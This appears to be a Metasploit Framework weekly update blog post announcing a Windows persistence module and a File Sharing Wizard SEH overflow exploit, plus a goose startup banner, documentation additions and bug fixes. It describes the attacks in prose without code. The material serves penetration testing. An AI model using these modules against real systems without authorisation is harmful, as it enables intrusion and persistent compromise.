Exploiting Windows tools

There are two new Windows modules this week, both brought to you by the Metasploit team.

The Windows Silent Process Exit Persistence module, from our own bwatters-r7, exploits a Windows tool that allows for debugging a specified process on exit. With escalated privileges, an attacker can configure the debug process and then use the module to upload a payload which will launch every time the specified binary exits.

The File Sharing Wizard - POST SEH Overflow module, contributed by our own dwelch-r7, exploits a vulnerability in the Windows File Sharing Wizard. An unauthenticated HTTP POST Structured Exception Handler (SEH) buffer overflow allows a remote attacker to obtain arbitrary code execution on vulnerable Windows targets.

Untitled Goose Banner

A contribution by 0xGilda addresses a glaring omission from msfconsole, which is its lack of Untitled Goose Game homages. A new goose banner has been added, which you can now see on startup. HONK!

                                   ___          ____
                               ,-""   `.      < HONK >
                             ,'  _   e )`-._ /  ----
                            /  ,' `-._<.===-'
                           /  /
                          /  ;
              _          /   ;
 (`._    _.-"" ""--..__,'    |
 <_  `-""                     \
  <`-                          :
   (__   <__.                  ;
     `-.   '-.__.      _.'    /
        \      `-.__,-'    _,'
         `._    ,    /__,-'
            ""._\__,'< <____
                 | |  `----.`.
                 | |        \ `.
                 ; |___      \-``
                 \   --<
                  `.`.<
                    `-'

       =[ metasploit v5.0.54-dev-82c77a4ec8               ]
+ -- --=[ 1931 exploits - 1079 auxiliary - 332 post       ]
+ -- --=[ 556 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

msf5 > 

New modules (2)

Enhancements and features

  • PR #12398 by nsa adds documentation for the auxiliary/scanner/ssh/ssh_version module.
  • PR #12368 by h00die adds documentation for the auxiliary/server/capture/smb module.
  • PR #12396 by bwatters-r7 updates metasploit-payloads to version 1.3.78, which adds support for key event management in Java payloads.
  • PR #12388 by zeroSteiner adds metadata to the SMB client library, which enables detection of required signatures for incoming connections to the target host.

Bugs fixed

  • PR #12432 by busterb fixes a false negative bug in the BlueKeep scanner by checking the length of the result from an rdp_recv call in the RDP library.
  • PR #12404 by bcoles fixes a bug with the shell session handler that resulted in unexpected deletion of directories when the path contained a space.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

We recently announced the release of Metasploit 5. You can get it by cloning
the Metasploit Framework repo (master branch). To install fresh without using git,
you can use the open-source-only Nightly Installers or the binary installers
(which also include the commercial editions).